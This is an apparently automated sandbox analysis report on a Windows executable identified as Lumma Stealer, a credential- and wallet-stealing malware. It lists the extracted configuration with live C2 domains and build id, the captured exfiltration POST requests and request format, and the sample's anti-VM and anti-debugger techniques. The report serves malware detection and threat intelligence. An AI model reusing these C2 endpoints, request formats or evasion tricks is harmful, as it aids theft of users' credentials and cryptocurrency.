Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1545849
MD5: 900b4f529c53a8740d16c0372dc2ca9a
SHA1: 342f5cd2f6a7beecca59553f4d970454caa961ca
SHA256: d22ac8685cb5b613bf5b6271239cd4c51b680d06a41f3c4d4d5aaefbf9ad5bc6
Tags: exe user-Bitsight

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 6648 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 900B4F529C53A8740D16C0372DC2CA9A)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["presticitpo.store", "crisiwarny.store", "thumbystriw.store", "navygenerayk.store", "fadehairucw.store", "founpiuer.store", "scriptyprefej.store", "necklacedmny.store"], "Build id": "4SD0y4--legendaryy"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author
00000000.00000003.2086942025.00000000010B1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2086909296.00000000010A6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2102016717.00000000010B1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2087372814.00000000010B1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2102226797.00000000010B2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-31T07:14:04.217328+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | TCP
2024-10-31T07:14:05.358191+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
2024-10-31T07:14:04.217328+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | TCP
2024-10-31T07:14:05.358191+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
2024-10-31T07:14:03.702728+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | TCP
2024-10-31T07:14:04.881356+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
2024-10-31T07:14:06.208818+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49706 | 188.114.96.3 | 443 | TCP
2024-10-31T07:14:07.434036+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | TCP
2024-10-31T07:14:08.803736+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49708 | 188.114.96.3 | 443 | TCP
2024-10-31T07:14:10.354086+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49709 | 188.114.96.3 | 443 | TCP
2024-10-31T07:14:11.771050+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49710 | 188.114.96.3 | 443 | TCP
2024-10-31T07:14:14.835728+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49711 | 188.114.96.3 | 443 | TCP
2024-10-31T07:14:02.910872+0100 | 2057129 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49889 | 1.1.1.1 | 53 | UDP
2024-10-31T07:14:02.924571+0100 | 2057127 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 62785 | 1.1.1.1 | 53 | UDP
2024-10-31T07:14:03.060815+0100 | 2057123 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 60107 | 1.1.1.1 | 53 | UDP
2024-10-31T07:14:02.863132+0100 | 2057131 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 52090 | 1.1.1.1 | 53 | UDP
2024-10-31T07:14:02.944497+0100 | 2057125 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 55922 | 1.1.1.1 | 53 | UDP
2024-10-31T07:14:10.646203+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 188.114.96.3 | 443 | TCP

AV Detection

Source: file.exe, Avira: detected
Source: file.exe.6648.0.memstrmin, Malware Configuration Extractor: LummaC {"C2 url": ["presticitpo.store", "crisiwarny.store", "thumbystriw.store", "navygenerayk.store", "fadehairucw.store", "founpiuer.store", "scriptyprefej.store", "necklacedmny.store"], "Build id": "4SD0y4--legendaryy"}
Source: necklacedmny.store, Virustotal: Detection: 22%
Source: thumbystriw.store, Virustotal: Detection: 14%
Source: presticitpo.store, Virustotal: Detection: 11%
Source: file.exe, ReversingLabs: Detection: 39%
Source: file.exe, Virustotal: Detection: 51%
Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe, Joe Sandbox ML: detected
Source: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, String decryptor:
  • scriptyprefej.store
  • navygenerayk.store
  • founpiuer.store
  • necklacedmny.store
  • thumbystriw.store
  • fadehairucw.store
  • crisiwarny.store
  • presticitpo.store
  • presticitpo.store
  • lid=%s&j=%s&ver=4.0
  • TeslaBrowser/5.5
  • - Screen Resoluton:
  • - Physical Installed Memory:
  • Workgroup: -
  • 4SD0y4--legendaryy
Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_0061D7F8 CryptUnprotectData
Source: file.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49710 version: TLS 1.2

Networking

Source: Network traffic, Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:49889 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:55922 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:52090 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:60107 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49711 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49704 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49710 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49707 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49709 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49708 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:62785 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49706 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 188.114.96.3:443
Source: Joe Sandbox View, IP Address: 188.114.96.3
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic, HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: necklacedmny.store
Source: global traffic, HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 52
  Host: necklacedmny.store
Source: global traffic, HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 12840
  Host: necklacedmny.store
Source: global traffic, HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 15082
  Host: necklacedmny.store
Source: global traffic, HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 20572
  Host: necklacedmny.store
Source: global traffic, HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 1255
  Host: necklacedmny.store
Source: global traffic, HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 585899
  Host: necklacedmny.store
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: presticitpo.store
Source: global traffic, DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic, DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic, DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic, DNS traffic detected: DNS query: necklacedmny.store
Source: unknown, HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: necklacedmny.store
              Source: file.exe, 00000000.00000003.2155745718.00000000056F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2162814769.00000000056F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api.IL
              Source: file.exe, 00000000.00000003.2155758852.0000000001031000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2156940751.0000000001031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apiG
              Source: file.exe, 00000000.00000003.2155745718.00000000056F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2162814769.00000000056F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apiPI
              Source: file.exe, 00000000.00000003.2155745718.00000000056F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2162814769.00000000056F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apiersionnF
              Source: file.exe, 00000000.00000003.2155745718.00000000056F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2162814769.00000000056F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apitio
              Source: file.exe, 00000000.00000003.2101926012.0000000005703000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124794270.00000000056F6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124724016.0000000005704000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113979900.0000000005703000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2162831044.0000000005704000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/c
              Source: file.exe, 00000000.00000003.2075150921.0000000001095000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155414603.000000000108A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074555367.0000000001094000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2156988651.000000000108A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/m
              Source: file.exe, file.exe, 00000000.00000003.2155487590.000000000100E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2156847859.000000000100E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store:443/api
              Source: file.exe, 00000000.00000002.2156847859.000000000100E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store:443/apiicrosoft
              Source: file.exe, 00000000.00000003.2088361896.0000000005810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.2088361896.0000000005810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: file.exe, 00000000.00000003.2102002943.000000000570F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101926012.000000000570E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
              Source: file.exe, 00000000.00000003.2102002943.000000000570F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101926012.000000000570E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
              Source: file.exe, 00000000.00000003.2062528967.000000000572C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.2062528967.000000000572C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: file.exe, 00000000.00000003.2088361896.0000000005810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: file.exe, 00000000.00000003.2088361896.0000000005810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: file.exe, 00000000.00000003.2088361896.0000000005810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: file.exe, 00000000.00000003.2088361896.0000000005810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.2088361896.0000000005810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: file.exe, 00000000.00000003.2088361896.0000000005810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49710 version: TLS 1.2

              System Summary

              Source: file.exe Static PE information: section name:
              Source: file.exe Static PE information: section name: .idata
              Source: C:\Users\user\Desktop\file.exe Code function: String function: 0060E190 appears 152 times
              Source: C:\Users\user\Desktop\file.exe Code function: String function: 0060C890 appears 69 times
              Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exe Static PE information: Section: ZLIB complexity 0.998046875
              Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@5/1
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00632240 CoCreateInstance,0_2_00632240
              Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: file.exe, 00000000.00000003.2074641754.000000000572E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2062308476.000000000571A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2062632582.00000000056FB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exe ReversingLabs: Detection: 39%
              Source: file.exe Virustotal: Detection: 51%
              Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: file.exe String found in binary or memory: N{WRtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNePW
              Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
              Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
              Source: file.exe Static file information: File size 3093504 > 1048576
              Source: file.exe Static PE information: Raw size of vphonoxp is bigger than: 0x100000 < 0x2c7800

              Data Obfuscation

              Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.600000.0.unpack :EW;.rsrc:W;.idata :W;vphonoxp:EW;aljcmtdz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;vphonoxp:EW;aljcmtdz:EW;.taggant:EW;
              Source: initial sample Static PE information: section where entry point is pointing to: .taggant
              Source: file.exe Static PE information: real checksum: 0x2f345e should be: 0x2fc12d
              Source: file.exe Static PE information: section name:
              Source: file.exe Static PE information: section name: .idata
              Source: file.exe Static PE information: section name: vphonoxp
              Source: file.exe Static PE information: section name: aljcmtdz
              Source: file.exe Static PE information: section name: .taggant
              Source: file.exe Static PE information: section name: entropy: 7.978424243223096

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
              Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8343FE second address: 834402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8349B6 second address: 8349BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8349BE second address: 834A06 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3D50D0EC66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov ebx, 3DB58F0Eh 0x00000011 push 00000000h 0x00000013 or edi, 4117D899h 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+1247040Ch], esi 0x00000021 xchg eax, esi 0x00000022 jmp 00007F3D50D0EC77h 0x00000027 push eax 0x00000028 jnl 00007F3D50D0EC74h 0x0000002e push eax 0x0000002f push edx 0x00000030 jp 00007F3D50D0EC66h 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838A14 second address: 838A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D507EA972h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3D507EA96Bh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C0C4 second address: 83C0C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C0C8 second address: 83C0CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 837BB3 second address: 837BC0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
